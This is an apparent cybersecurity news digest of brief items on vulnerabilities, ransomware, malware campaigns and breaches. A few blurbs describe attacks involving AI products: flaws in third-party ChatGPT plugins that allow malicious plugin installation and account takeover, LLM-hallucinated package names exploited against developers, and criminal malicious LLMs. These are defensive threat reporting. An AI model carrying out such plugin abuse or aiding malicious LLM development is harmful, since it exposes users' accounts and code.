Threat actors are actively targeting unpatched Atlassian servers using a critical security vulnerability known as CVE-2023-22518, which has a CVSS score of 9.1. This vulnerability affects the Atlassian Confluence Data Center and Server, allowing attackers to reset Confluence and create an administrator account without authentication. Once they gain this level of access, threat actors can assume control of the affected systems.

Cisco Duo Warns Third-Party Data Breach Exposed SMS MFA Logs

Cisco Duo recently sent out a notice warning that some of their customer's VoIP and SMS logs for multi-factor authentication messages were stolen by hackers in a cyberattack on the vendor's telephony providers. According to Cisco Duo, an unnamed provider who handles the company's SMS and VOIP multi-factor authentication messages was compromised on April 1, 2024. In this case, the actor was able to obtain employee credentials via a phishing attack which were then used to gain access to the telephony provider's systems.

PuTTY SSH Client Flaw Allows Recovery of Cryptographic Private Keys

The discovery of CVE-2024-31497 in PuTTY versions 0.68 through 0.80 unveils a critical vulnerability that exposes cryptographic private keys to potential recovery by attackers. This flaw stems from PuTTY's method of generating ECDSA nonces, introducing a bias that weakens the security of private key generation, particularly on the NIST P-521 curve.

Open Source Leaders Warn of XZ Utils-Like Takeover Attempts

The OpenSSF and OpenJS Foundations have issued a warning to open source maintainers regarding a series of social engineering attacks reminiscent of the xz Utils campaign. These attacks involve suspicious emails sent to the OpenJS Foundation Cross Project Council, requesting urgent updates to popular JavaScript projects under the pretext of addressing critical vulnerabilities.

Cybersecurity Pros Urge US Congress to Help NIST Restore NVD Operation

Professionals in the vulnerability management community warned that the lasting issues of the US National Vulnerability Database (NVD) could lead to a major supply chain security crisis. 50 cybersecurity professionals consolidated to sign and send an open letter on April 12th to several members of the US Congress including the Secretary of Commerce which addressed the ongoing issues with NVD.

7 Top IT Challenges in 2024

In recent years, AI, cybersecurity, and digital transformation have emerged as pivotal themes shaping the landscape of IT. Organizations must stay ahead of the curve, understanding the evolving dynamics, reasons behind them, and how to adapt.

AT&T Data Breach: Impact Extends to 51 Million Customers

AT&T has confirmed a data breach impacting 51 million former and current customers, after previously denying ownership of the leaked data. The breach, initially reported in 2021 by threat actor ShinyHunters and later by 'MajorNelson', exposed personal information including names, email addresses, phone numbers, social security numbers, and AT&T account details. Although AT&T claims no financial data or call history was compromised, the breach still poses significant risks to affected individuals.

From PDFs to Payload: Bogus Adobe Acrobat Reader Installers Distribute Byakugan Malware

A new malware variant known as Byakuan is being distributed through fake Adobe Reader installers. This malicious campaign was initially uncovered by AnhLab Security Intelligence researchers and further analyzed by Fortinet Fortiguard Labs. The attack begins with a PDF file written in Portuguese, which, upon opening, displays a blurred image and prompts the user to click on a link to download the Adobe Reader application to view the content.

RDP Abuse Present in 90% of Ransomware Breaches

Researchers at Sophos have observed a significant rise in Remote Desktop Protocol exploitation within ransomware attacks, based on their analysis of 150 incident response cases from 2023. They found that RDP abuse featured in a staggering 90% of these cases, allowing threat actors to gain unauthorized remote access to Windows environments.

AI Hallucinated Packages Fool Unsuspecting Developers

A recent report from Lasso Security, has raised concerns about software developers potentially using nonexistent or hallucinated software packages when relying on chatbots to build applications. The report, based on continued research by Bar Lanyado from Lasso, builds upon previous findings that demonstrated how large language models can inadvertently recommend packages that do not actually exist.

Indian Government Rescues 250 Citizens Forced into Cybercrime in Cambodia

The Indian government has confirmed that it has rescued and repatriated around 250 Indian citizens who were held captive in Cambodia and coerced into executing cyber scams that target people in India. These victims of human trafficking were carefully lured by crime racket agents under the guise of employment opportunities, but these victims were forced into “cyber slavery” instead.

Inc Ransom Claims to Be Behind 'Cyber Incident' at UK City Council

The cybercriminal group INC Ransom has claimed responsibility for the ongoing cybersecurity incident at Leicester City Council, marking the first involvement of an established cybercrime gang in the local authority's IT troubles. According to a post on INC Ransom's leak blog, they assert having stolen 3 TB of council data before deleting it shortly after publication.

AT&T Resets Passcodes for 7.6 Million Customers Following Dark Web Data Leak

AT&T has reset passcodes for 7.6 million current customers and 65.4 million former subscribers following a data leak discovered on the dark web. The leaked information, dating back to 2019 and earlier, varies in content, potentially including full names, email addresses, mailing addresses, phone numbers, social security numbers, dates of birth, and AT&T account numbers.

Exposing a New BOLA Vulnerability in Grafana

Palo Alto Network's Unit 42 researchers uncovered and disclosed a new Broken Object Level Authorization (BOLA) vulnerability that affects Grafana versions from 9.5.0 to 9.5.18, from 10.0.0 to 10.0.13, from 10.1.0 to 10.1.9, from 10.2.0 to 10.2.6, and from 10.3.0 to 10.3.5. Grafana is an established open-source data visualization and monitoring solution with almost 60,000 stars on GitHub that helps organizations drive business processes.

DinodasRAT Linux Implant Targeting Entities Worldwide

Kaspersky has disclosed details of a new Linux version of DinodasRAT that it discovered in early October 2023 after a publication from ESET. Also known as XDealer, the trojan is a multi-backdoor written in C++ that enables actors to surveil and harvest sensitive data from targeted systems.

Hackers Developing Malicious LLMs After WormGPT Falls Flat

Researchers have noted that cybercriminals are increasingly interested in developing malicious large language models due to the limitations of existing tools like WormGPT. Ransomware and malware operators are also showing interest in this trend. The demand for AI talent has risen as previous tools like WormGPT failed to meet cybercriminals' needs.

Agent Tesla's New Ride: The Rise of a Novel Loader

SpiderLabs has disclosed details of a new campaign that utilized a novel loader to ultimately deploy Agent Tesla on targeted systems. Researchers note that they identified a phishing email on March 8, 2024, which contained a seemingly harmless archive masquerading as a legitimate payment receipt from a bank.

Street Newspaper Appears to Have Big Issue with Qilin Ransomware Gang

The parent company of The Big Issue, a renowned street newspaper supporting homeless people, is facing a cybersecurity crisis initiated by the Qilin ransomware gang. The gang has claimed to have stolen 550 GB of sensitive company data, including personal information like driving licenses, salary details of executives, and even passport and bank details of key figures within the organization.

Sketchy NuGet Package Likely Linked to Industrial Espionage Targets Developers

Threat hunters have identified a potentially nefarious package named SqzrFramework480 within the NuGet package manager. This package is suspected to target developers using tools from a Chinese industrial technology firm known for manufacturing industrial and digital equipment. The package, uploaded by a user named "zhaoyushun1999," contains a DLL file named "SqzrFramework480[.]dll" that exhibits several concerning behaviors.

N. Korea-linked Kimsuky Shifts to Compiled HTML Help Files in Ongoing Cyberattacks

The North Korea-linked threat actor known as Kimsuky (aka Black Banshee, Emerald Sleet, or Springtail) has been observed shifting its tactics, leveraging CHM files as attack vectors in the delivery phase to deploy malware for harvesting sensitive data. Kimsuky has been active for over 10 years and is notorious for targeting entities in South Korea, North America, Europe, and Asia, gathering intelligence relative to North Korea's interests.

Russia Hackers Using TinyTurla-NG to Breach European NGO's Systems

Cisco Talos has provided updated details on a new campaign where the Russian espionage group Turla deployed their custom backdoor dubbed TinyTurla-NG to infect multiple systems in the compromised network of a European non-government organization (NGO). While it's unclear how exactly the group gained initial access, Turla in the past has initiated drive-by compromises and employed phishing lures to obtain a foothold into victim environments.

Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect

Mandiant's investigation reveals a sophisticated cyber threat campaign attributed to a Chinese threat actor group named UNC5174, also known by the alias "Uteus." The group employs a combination of novel and known vulnerabilities to target a wide range of organizations globally, including U.S. defense contractors, government entities, research institutions, and NGOs.

Ivanti Releases Urgent Fix for Critical Sentry RCE Vulnerability

Ivanti has revealed a critical remote code execution vulnerability affecting Standalone Sentry and has urged customers to promptly apply the available patches for protection against potential cyber threats. Tracked as CVE-2023-41724 with a CVSS score of 9.6 this flaw allows unauthenticated attackers to execute arbitrary commands on the appliance's operating system within the same network.

New ‘Loop DoS' Attack May Impact up to 300,000 Online Systems

Researchers at CIPSPA Helmholtz-Center for Information Security have discovered a new denial-of-service attack known as ‘Loop DoS', which targets application layer protocols and exploits a vulnerability in the UDP. This attack can cause an indefinite communication loop between network services, resulting in a significant increase in traffic.

AndroxGh0st Malware Targets Laravel Apps to Steal Cloud Credentials

Juniper Threat Labs has released details on a Python-based tool, dubbed AndroxGh0st, designed to target Laravel applications and steal sensitive data. Laravel is an open-source PHP web application development framework that is used for designing web applications such as e-commerce platforms, APIs, content management systems, etc.

New AcidPour data wiper targets Linux x86 Network Devices

SentinelLab's security researcher Tom Hegel has spotted a new destructive malware dubbed AcidPour, which seems to be a variant of the AcidRain data wiper that was used to target satellite communications provider Viasat back in 2022. In a series of threads on X (formerly known as Twitter), Juan Andres Guerrero Saade, AVP of Research for SentinelLabs, provided details regarding the new data wiper, noting that it is designed to target Linux x86 IoT and networking devices.

Chinese Earth Krahang Hackers Breach 70 Orgs in 23 Countries

Trend Micro has released details surrounding a campaign that has been ongoing since early 2022. The campaign has been attributed to a Chinese APT group dubbed ‘Earth Krahang,' who according to researchers has breached 70 organizations and targeted at least 116 entities across 45 countries since initiating operations.

Conversation Overflow' Cyberattacks Bypass AI Security to Target Execs

A novel cyberattack method called "Conversation Overflow" has recently surfaced, showcasing cybercriminals' attempts to bypass AI- and ML-enabled security platforms through sophisticated techniques. This attack tactic, analyzed by SlashNext researchers, is observed in multiple incidents, indicating a deliberate effort to evade advanced cybersecurity defenses.

Malware Analysis Report

The report provides an analysis of a njRAT (Remote Access Trojan) sample discovered in October 2023. The malware, written in .NET, allows attackers to remotely control infected machines. Basic static analysis reveals key file information and suspicious strings indicating registry manipulation, network communication, and process control.

Kaspersky Reports Phishing Attacks Grew By 40 Percent in 2023

A new report from Kaspersky noted that its anti-phishing system was able to deter over 709 million attempts to access phishing and scam websites in 2023, highlighting a 40 percent increase over 2022. A spike in phishing activity was observed between May and June, where actors used travel-related lures including counterfeit airline tickets and fake hotel deals to gain potential victims.

Increase in the Number of Phishing Messages Pointing to IPFS and to R2 Buckets

Credential-stealing phishing remains a persistent threat, with threat actors continually evolving their tactics. While various methods for hosting phishing pages exist, including third-party services and email attachments, traditional approaches involving internet-connected servers remain common. A recent trend observed involves an increase in phishing campaigns utilizing IPFS (InterPlanetary File System) and R2 buckets, a Cloudflare object storage service, to host malicious content.

McDonald's IT Systems Outage Impacts Restaurants Worldwide

The recent global IT outages experienced by McDonald's restaurants have caused significant disruptions to operations across multiple countries. These outages, which commenced overnight, have led to widespread difficulties in order-taking and payment processing, prompting some stores to close temporarily.

Third-Party ChatGPT Plugins Could Lead to Account Takeovers

Researchers have discovered vulnerabilities in third-party plugins for OpenAI's ChatGPT, which could be exploited by attackers to gain unauthorized access to sensitive data. Salt Labs published research revealing security flaws in ChatGPT and its ecosystem, allowing attackers to install malicious plugins without user consent and take over accounts on platforms like Github.

Ande Loader Malware Targets Manufacturing Sector in North America

Blind Eagle, also known as APT-C-36, has been observed utilizing a loader malware named Ande Loader to distribute remote access trojans (RATs) like Remcos RAT and NjRAT. The attacks primarily target Spanish-speaking users in the manufacturing industry based in North America. These malicious activities are executed through phishing emails containing RAR and BZ2 archives, serving as the initial vectors of infection.

US Govt Probes if Ransomware Gang Stole Change Healthcare Data

The U.S. Department of Health and Human Services is investigating whether protected health information was stolen in a ransomware attack that hit UnitedHealthcare Group (UHG) subsidiary Optum, which operates the Change Healthcare platform, in late February. This investigation is coordinated by HHS' Office for Civil Rights (OCR), which enforces the Health Insurance Portability and Accountability Act (HIPAA) rules that protect patients' health information from being disclosed without their knowledge or consent.

What a Cluster: Local Volumes Vulnerability in Kubernetes

A high-severity vulnerability, CVE-2023-5528, with a CVSS score of 7.2, has been discovered by Akamai security researcher Tomer Peled in Kubernetes. This vulnerability allows remote code execution with SYSTEM privileges on all Windows endpoints within a Kubernetes cluster, posing a significant threat. It can be exploited via malicious YAML files, potentially leading to full takeover of Windows nodes.

Russia's Foreign Intelligence Service Alleges US Is Plotting to Interfere in Presidential Election

Russia's Foreign Intelligence Service (SVR) alleges that the US is plotting to interfere in its upcoming presidential election scheduled this month. According to SVR, US nation-state actors plan to launch cyber attacks against Russian voting systems to disrupt operations and interfere with the vote-counting process, as reported by Reuters. “According to information received by the Foreign Intelligence Service of the Russian Federation, the administration of J. Biden is setting a task for American NGOs to achieve a decrease in turnout,” reads a statement issued by the SVR and reported by Reuters.

Alert: Cybercriminals Deploying VCURMS and STRRAT Trojans via AWS and GitHub Summary:

A recent phishing scheme has been detected distributing remote access trojans like VCURMS and STRRAT through a malicious Java-based downloader. The attackers utilized public services like AWS and Github to host malware, employing a commercial protector to evade detection. An unusual element of the campaign is VCURMS' use of a Proton Mail email address for communication with a C2 server.

Cloud Account Attacks Surged 16-Fold in 2023

According to Red Canary's 2024 Threat Detection Report, cloud account threats surged by 16 times in 2023, with attackers adopting new strategies tailored for cloud environments. Attacks exploiting T1078.004: Cloud Accounts, a technique outlined by MITRE ATT&CK for cloud account compromises, rose to become the fourth most prevalent method used by threat actors, a significant increase from its 46th position in 2022.

Secure Cloud Business Applications: Hybrid Identity Solutions Guidance

Identity management for a traditional on-premises enterprise network is usually handled by an on-premises directory service (e.g., Active Directory). When organizations leverage cloud solutions and attempt to integrate them with their on-premises systems (creating a “hybrid” environment), identity management can become significantly more complex.

Over 12 Million Auth Secrets and Keys Leaked on GitHub in 2023

A new report from GitGuardian notes that GitHub users accidentally leaked 12.8 million authentication and sensitive secrets during 2023, highlighting a 28 percent increase over the previous year. The IT sector accounted for the most secrets leaked (65.9%), followed by education, science, retail, manufacturing, etc. T

Ransomware: Attacks Continue to Rise as Operators Adapt to Disruption

Despite a decrease in the number of publicly claimed ransomware attacks, ransomware activity remains a significant threat, with attackers adapting to disruption and refining their tactics. Vulnerability exploitation has emerged as the primary infection vector, with attackers targeting known vulnerabilities in public-facing applications. LockBit, Noberus, and Clop are among the most prolific ransomware operations, with LockBit being the largest threat, followed by Noberus and Clop.

Typosquatting Wave Shows No Signs of Abating

In the ever-evolving landscape of cybersecurity threats, one tactic stands out for its enduring effectiveness: typosquatting. Since the dawn of the commercial internet, threat actors have leveraged this deceptive strategy to impersonate legitimate businesses, exploiting users' inattention and human errors to propagate malware, steal data, and pilfer funds.

Three-Quarters of Cyber Incident Victims Are Small Businesses

A new report from Sophos highlighted that over three-quarters of cyber incidents in 2023 impacted small businesses. Ransomware in particular made up a good chunk of these incidents with groups like LockBit, Akira, BlackCat, and Play leading the forefront in terms of the attacks observed against small businesses. Sophos notes that tactics employed by ransomware groups evolved as 2023 progressed, including the employment of remote encryption, where these actors have been observed abusing unmanaged devices on organizations' networks to attempt files on other systems via network file access.

Researchers Expose Microsoft SCCM Misconfigurations Usable in Cyberattacks

Security researchers have created a knowledge base repository for attack and defense techniques based on improperly setting up Microsoft's Configuration Manager, which could allow an attacker to execute payloads or become a domain controller. Configuration Manager (MCM), formerly known as System Center Configuration Manager (SCCM, ConfigMgr), has been around since 1994 and is present in many Active Directory environments, helping administrators manage servers and workstations on a Windows network.

Magnet Goblin Hackers Use 1-Day Flaws to Drop Custom Linux Malware

A financially motivated hacking group exploits newly disclosed 1-day vulnerabilities to infiltrate public-facing servers, deploying custom malware on both Windows and Linux systems. These vulnerabilities, publicly disclosed but not yet patched, are swiftly leveraged by threat actors before security updates can be applied. Analysts identified rapid exploitation of these vulnerabilities, sometimes within a day of a proof of concept exploit being released.

NSA Launches Top 10 Cloud Security Mitigation Strategies

As businesses transition towards hybrid and multi-cloud environments, the prevalence of cloud misconfigurations and security vulnerabilities has emerged as a significant concern. Cyber threat actors are capitalizing on these vulnerabilities, targeting misconfigured or inadequately secured cloud systems.

Dropbox Used to Steal Credentials and Bypass MFA in Novel Phishing Campaign

Security company Darktrace shared details around a new phishing campaign leveraging legitimate Dropbox infrastructure to bypass multi-factor authentication (MFA). Darktrace notes in their report that while it is common for attackers to exploit the trust of users by mimicking common services, this campaign took things a step further and actually used the legitimate cloud storage platform.

Switzerland: Play Ransomware Leaked 65,000 Government Documents

Switzerland's National Cyber Security Centre (NCSC) has released details surrounding a ransomware attack on Xplain which impacted thousands of sensitive government files. Xplain is a Swiss technology and software solutions company, which supports various government departments, administrative units, and even the country's military.

'The Weirdest Trend in Cybersecurity': Nation-States Returning to USBs

During a keynote presentation this week at CPX 2024 in Las Vegas, the vice president of research at Check Point, Maya Horowitz, highlighted the resurgence of USBs used by Nation-state actors to compromise highly secured government organizations and critical infrastructure facilities. According to Horowitz, three major threat groups employed USBs as their primary initial infection vector in 2023: Chinese Nation-state group Mustang Panda, Russian APT group Gamaredon, and the actors behind the Raspberry Robin worm.

NSA's Zero-Trust Guidelines Focus on Segmentation

The US National Security Agency (NSA) has released guidelines for zero-trust network security, aiming to provide a structured approach towards its adoption. Despite the increasing recognition of zero trust as a vital security strategy, its implementation remains slow, necessitating clear guidance and support.

New Python-Based Snake Info Stealer Spreading Through Facebook Messages

Facebook messages are being used by threat actors to a Python-based information stealer dubbed Snake that's designed to capture credentials and other sensitive data. "The credentials harvested from unsuspecting users are transmitted to different platforms such as Discord, GitHub, and Telegram," Cybereason researcher Kotaro Ogino said in a technical report.

FBI Releases 2023 Internet Crime Report

The report issued on March 6, 2024, highlights the escalating cybercrime landscape in the United States, with a record number of complaints received by the Internet Crime Complaint Center (IC3) in 2023. Key points include a substantial increase in financial losses, with investment fraud, Business Email Compromise (BEC), and ransomware standing out as significant threats.

Critical TeamCity Bugs Endanger Software Supply Chain

Critical vulnerabilities have been uncovered in the on-premises deployments of JetBrains TeamCity, a widely used Continuous Integration/Continuous Deployment (CI/CD) pipeline tool. These vulnerabilities, known as CVE-2024-27198 and CVE-2024-27199, pose significant risks as they could enable threat actors to gain administrative control over TeamCity servers.

ScreenConnect Flaws Exploited to Drop New ToddlerShark Malware

Late last month, ConnectWise addressed two flaws impacting its remote access software ScreenConnect, which could be exploited by actors to bypass authentication (CVE-2024-1709) and execute code remotely (CVE-2024-1708). Since then, several threat actors have abused the flaws, particularly CVE-2024-1709, in the wild to deploy various payloads including ransomware (Black Basta, Bl00dy, LockBit), remote access trojans, info stealers, and much more.

Stealthy GTPDOOR Linux Malware Targets Mobile Operator Networks

Security researcher HaxRob discovered a previously unknown Linux backdoor named GTPDOOR, designed for covert operations within mobile carrier networks. The threat actors behind GTPDOOR are believed to target systems adjacent to the GPRS roaming eXchange (GRX), such as SGSN, GGSN, and P-GW, which can provide the attackers direct access to a telecom's core network.

Content Farm Impersonates 60+ Major News Outlets

Researchers at Bleeping Computer have discovered a content farm that masquerades as reputable news sources, including a couple major news outlets. These sites plagiarize articles without attribution, essentially stealing content from credible news organizations and research institutes.

TA577 Exploits NTLM Authentication Vulnerability

Proofpoint cybersecurity researchers have uncovered a new tactic employed by cybercriminal threat actor TA577, revealing a previously unseen objective in their operations. The group was found using an attack chain aimed at stealing NT LAN manager (NTLM) authentication information, which could potentially be used for sensitive data gathering and further malicious activities.

Blackcat Ransomware Turns off Servers Amid Claim They Stole $22 Million Ransom

BleepingComputer has uncovered new developments regarding the ALPHV/BlackCat ransomware gang's activities. According to reports, the gang has taken the drastic step of shutting down its servers amidst accusations of defrauding an affiliate out of a staggering $22 million. This affiliate is believed to have been responsible for the attack on Optum's Change Healthcare platform.

Hackers Stole ‘Sensitive' Data From Taiwan Telecom Giant: Ministry

Last Friday, Taiwan's Ministry of National Defense confirmed an attack on the country's largest telecom company, Chunghwa Telecom, enabling hackers to steal sensitive information including military and government contracts. The actors have advertised the data stolen on the dark web, allegedly claiming to have exfiltrated 1.7 TeraBytes of data from Chunghwa Telecom.

Five Eyes Warn of Ivanti Vulnerabilities Exploitation, Detection Tools Insufficient

On February 29, government agencies from the Five Eyes countries, comprising Australia, Canada, New Zealand, the UK, and the US, issued an urgent warning regarding the active exploitation of vulnerabilities found in Ivanti products. These vulnerabilities, which include CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893, affect all supported versions of Ivanti gateways, spanning from 9.x to 22.x.

Cybercriminals Harness AI for New Era of Malware Development

Observations made by researchers at Group-IB showcase cybercriminals increasingly harnessing the power of artificial intelligence to develop more advanced and potent malware, as evidenced by the escalating number of ransomware attacks and the collaborative efforts between ransomware groups and initial access brokers.

New Phishing Kit Leverages SMS, Voice Calls to Target Cryptocurrency Users

A new phishing kit has emerged, targeting cryptocurrency users by impersonating login pages of prominent cryptocurrency services, with a focus on mobile devices. The kit allows attackers to create fake single sign-on (SSO) pages, using a combination of email, SMS, and voice phishing to deceive victims into divulging sensitive information, including usernames, passwords, and even photo IDs.

'Savvy Seahorse' Hackers Debut Novel DNS CNAME Trick

A newly discovered threat actor, known as Savvy Seahorse, is orchestrating an investment scam by leveraging a sophisticated traffic distribution system (TDS) that exploits the Domain Name System (DNS). Savvy Seahorse impersonates reputable brands like Meta and Tesla through Facebook ads in multiple languages, enticing victims to create accounts on a fake investing platform.

Cybersecurity Agencies Warn Ubiquiti EdgeRouter Users of APT28's MooBot Threat

A joint advisory from cybersecurity and intelligence agencies highlight the MooBot threat targeting users of Ubiquiti EdgeRouters. This botnet, orchestrated by Russia's APT28, has been operational since at least 2022 and has been employed in various cyber operations globally. APT28, known for its affiliation with Russia's Main Directorate of the General Staff, has been active since 2007 and is notorious for its sophisticated cyber campaigns.

Black Basta, bl00dy Ransomware Gangs Join ScreenConnect Attacks

The Black Basta and Bl00dy ransomware groups have recently been identified as participants in a wave of attacks targeting vulnerable ScreenConnect servers. These attacks exploit a critical authentication bypass vulnerability (CVE-2024-1709), which enables threat actors to create administrative accounts on internet-exposed servers.

China Launches New Cyber-Defense Plan for Industrial Networks

China's Ministry of Industry and Information Technology (MIIT) has unveiled a comprehensive strategy aimed at bolstering data security within the nation's industrial sector. This initiative, slated for completion by the end of 2026, is designed to mitigate major risks posed by cyber threats to over 45,000 companies operating in various industrial verticals.

Change Healthcare Cyber-Attack Leads to Prescription Delays Summary:

Health tech firm Change Healthcare was hit with a cyberattack on February 21, 2024, leading to a disruption of a number of its systems and services. According to Change Healthcare numerous applications across areas such as pharmacy, medical records, dental, payment services, and patient engagement are still experiencing connectivity issues. In particular, pharmacies have reported being unable to process patient prescriptions, preventing individuals from getting their medications on time.

New ScreenConnect RCE Flaw Exploited in Ransomware Attacks

Last week enterprise IT giant ConnectWise released patches to address a maximum-severity flaw impacting its remote access software, ScreenConnect. Tracked as CVE-2024-1709, the bug pertains to an authentication bypass that could potentially enable attackers to gain access to confidential information or critical systems.

X Protests Forced Suspension of Accounts on Orders of India's Government

and government regulation in the digital age, particularly in countries like India where social and political tensions often spill over into online platforms. The global government affairs team at X, previously known as Twitter, has taken action to suspend certain accounts and posts within India as per directives received from the country's government.

Unmasking I-Soon | The Leak That Revealed China's Cyber Operations

The leak from I-Soon, a company contracting for various Chinese government agencies including the Ministry of Public Security, Ministry of State Security, and People's Liberation Army, occurred over the weekend of February 16th. The source of the leak and motives behind it remain unknown, but it offers unprecedented insight into the operations of a state-affiliated hacking contractor.

LockBit Ransomware Secretly Building Next-Gen Encryptor Before Takedown

Researchers at Trend Micro have uncovered details on a new LockBit sample that the actors were secretly building prior to law enforcement's takedown of the group's infrastructure earlier this week. The new sample dubbed LockBit-NG-Dev, is written in the .NET programming language and appears to be compiled with CoreRT, whereas previous LockBit samples were written in C++.

'Lucifer' Botnet Turns Up the Heat on Apache Hadoop Servers

A new iteration of the Lucifer botnet has emerged, specifically aimed at organizations utilizing Apache Hadoop and Apache Druid big data technologies. The variant combines the insidious traits of cryptojacking and distributed denial of service capabilities, posing a significant threat to vulnerable systems.

LockBit Leaks Expose Nearly 200 Affiliates and Bespoke Data-Stealing Malware

This article provides an update on recent revelations regarding the LockBit ransomware group. Law enforcement authorities have disclosed that nearly 200 "affiliates" have registered with the group over the past two years. Affiliates are individuals who participate in the gang's ransomware-as-a-service model, utilizing LockBit's tools in exchange for a share of the profits obtained from victims.

Warning of North Korean Cyber Threats Targeting the Defense Sector

The Bundesamt für Verfassungsschutz (BfV) of Germany and the National Intelligence Service (NIS) of the Republic of Korea (ROK) have issued a joint Cyber Security Advisory (CSA) to alert about cyber campaigns likely conducted by North Korean actors targeting the defense sector. North Korea's focus on military strength drives them to steal advanced defense technologies globally, using cyber espionage as a cost-effective method.

Cactus Ransomware Gang Claims The Theft Of 1.5tb Of Data From Energy Management And Industrial Autom

The Cactus ransomware group, who claimed responsibility for an attack on Schneider Electric, says they have stolen 1.5TBs of data from the energy management and industrial automation company. According to reports, the companies Sustainability Business division was targeted on January 17th. Impacts were felt as the companies cloud services faced outages, however, other divisions of the company were not impacted.

US Gov Dismantled The Moobot Botnet Controlled by Russia-Linked APT28

n January 2024, a court-authorized operation was able to take down Moobot Botnet, a network of hundreds of small office/home office (SOHO) routers under the control of the Russia-linked group APT28. This court order enabled law enforcement to use the Moobot malware to copy and delete stolen and malicious data and files from compromised routers.

Over 13,000 Ivanti gateways vulnerable to actively exploited bugs

This year, Ivanti has disclosed several vulnerabilities impacting its Connect Secure, Policy Secure, and ZTA gateways. Tracked as CVE-2024-22024, CVE-2023-46805, CVE-2024-21887, CVE-2024-21893, and CVE-2024-21888, these flaws range from high to critical in severity and pertain to a case of authentication bypass, server-side-request forgery, arbitrary command execution, and command injection. S

Russian Turla Hackers Target Polish NGOs with New TinyTurla-NG Backdoor

Cisco Talos disclosed details of a three-month-long campaign where Russia-linked threat actor Turla has been targeting Polish non-governmental organizations with a new backdoor dubbed TinyTurla-NG. This campaign has been ongoing since December 18, 2023, with researchers suspecting that the activity may have actually commenced in November 2023 based on malware compilation dates.

U.S. Internet Leaked Years of Internal, Customer Emails

A Minnesota-based Internet Service Provider U.S. Internet Corp has suffered a significant data leak. Specifically, a business unit called Securence, which specializes in providing filtered, secure email services to business, educational institutions and government agencies worldwide was accidently publishing more than a decade's worth of it's own internal emails, and that of thousands of clients, in plain text on the Internet where anyone could view it.

MFA and Software Supply Chain Security: It's No Magic Bullet

In a recent article from ReversingLabs, the importance of Multifactor Authentication (MFA) in securing software development environments, particularly in light of recent high-profile attacks such as SolarWinds, Codecov, and Kaseya. The report highlights how attackers target developer accounts to manipulate code, access secrets, and wreak havoc on organizations and their customers.

Warzone RAT Infrastructure Seized

On February 9, 2024, the Justice Department announced the seizure of internet domains selling the Warzone RAT malware, a sophisticated Remote Access Trojan. Domains including www[.]warzone[.]ws were seized, with two suspects arrested in Malta and Nigeria for selling the malware. The operation, led by the FBI and supported by Europol and J-CAT, aimed to disrupt cybercriminals using the malware.

FCC Makes AI-Generated Voices in Robocalls Illegal

The Federal Communications Commission (FCC) has made AI-generated voices in robocalls illegal under the Telephone Consumer Protection Act (TCPA), with a Declaratory Ruling that took effect immediately. This ruling aims to combat the rising trend of robocall scams that use AI-generated voices to deceive consumers, imitate celebrities, and spread misinformation.

Notorious Bumblebee Malware Re-emerges with New Attack Methods

The Bumblebee malware, known for its role as an initial access broker facilitating the download and execution of additional payloads like Cobalt Strike and Meterpreter, has made a comeback with fresh tactics after a period of dormancy. Proofpoint researchers observed a significant shift in the attack chain, diverging from previous Bumblebee patterns.

Bank of America Customer Data Stolen in Data Breach

Bank of America is warning its customers of a data breach exposing their personal information after one of its third-party service providers, Infosys McCamish System (IMS) fell victim to a cyber attack in November of last year. LockBit claimed responsibility for the attack, listing IMS on its data leak site on November 4.

Rhysida Ransomware Cracked, Free Decryption Tool Released

A group of researchers from Kookmin University and the Korea Internet and Security Agency (KISA) uncovered an implementation vulnerability enabling them to reconstruct encryption keys and decrypt data locked by Rhysida ransomware. “Rhysida ransomware employed a secure random number generator to generate the encryption key and subsequently encrypt the data.

Exploitation of Another Ivanti VPN Vulnerability Observed

Last week, Ivanti disclosed a new vulnerability impacting its Connect Secure, Policy Secure, and ZTA gateway appliances. Tracked as CVE-2024-22024, the flaw impacts the SAML component of these appliances and can be exploited by actors to gain access to restricted resources without authentication. At the time of the disclosure, Ivanti noted that it had no evidence to suggest that the flaw was being actively exploited.

Raspberry Robin Keeps Riding the Wave of Endless Zero-days

Researchers from Checkpoint have released a new report on the evolution of Raspberry Robin malware. The latest strains are stealthier and implement various 1-day exploits that are deployed on specific vulnerable systems. 1-day exploits are similar to zero-day exploits, but have a public disclosure and/or patch available by the vendor. Even though a patch may be available, threat actors will exploit these vulnerabilities soon after disclosure, before victims have installed the patch.

Ransomware Payments Reached Record $1.1 billion in 2023

In 2023, ransomware payments soared to a record $1.1 billion, reversing the declining trend in 2022. According to researchers from Chainalysis, this trend is likely attributed to the escalating attacks against major institutions and critical infrastructure and Clop's massive MOVEit campaign, which compromised dozens of organizations across the globe.

Lessons from the Mercedes-Benz Source Code Exposure

Mercedes-Benz faced a significant security breach when a private key was mistakenly left online, resulting in the exposure of sensitive internal data. The breach, discovered by RedHunt Labs security researchers, exposed critical internal information, intellectual property, and sensitive credentials. M

Verizon Insider Data Breach Hits over 63,000 Employees

Verizon Communications issued an advisory this week that an insider data breach has impacted almost half it's workforce, exposing sensitive employee personal identifiable information (PII). A data breach notification shared with the Office of the Maine Attorney General reveals that a Verizon employee gained unauthorized access to a file containing sensitive employee information on September 21, 2023.

Hackers Steal Data of 2 Million in SQL Injection, XSS Attacks

A group known as ‘Resume Looters' has conducted SQL injection attacks on 65 legitimate job listing and retail websites, compromising the personal data of over two million job seekers, mainly in the APAC region, The group targeted sites in Australia, Taiwan, China, Thailand, India, and Vietnam to steal names, email addresses, phone numbers, employment history, education and other information.

Beware: Fake Facebook Job Ads Spreading 'Ov3r_Stealer' to Steal Crypto and Credentials

A new campaign has been uncovered by Trustwave SpiderLabs where actors are using Facebook job advertisements to trick unsuspecting end users into installing a novel Windows-based stealer malware codenamed Ov3r_Stealer. For its part, Ov3r_Stealer is capable of siphoning IP address-based location, hardware info, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Microsoft Office documents, and a list of antivirus products installed on the compromised host.

US to Roll Out Visa Restrictions on People Who Misuse Spyware to Target Journalists, Activists

Yesterday, the Biden administration announced it would be rolling out a new policy to impose visa restrictions on foreign individuals involved in the misuse of commercial spyware. This includes those who have used spyware to target individuals such as journalists, activists, perceived dissidents, members of marginalized communities, or the family members of those who are targeted.

US Condemns Iran, Issues Sanctions for Cyber-Attacks on Critical Infrastructure

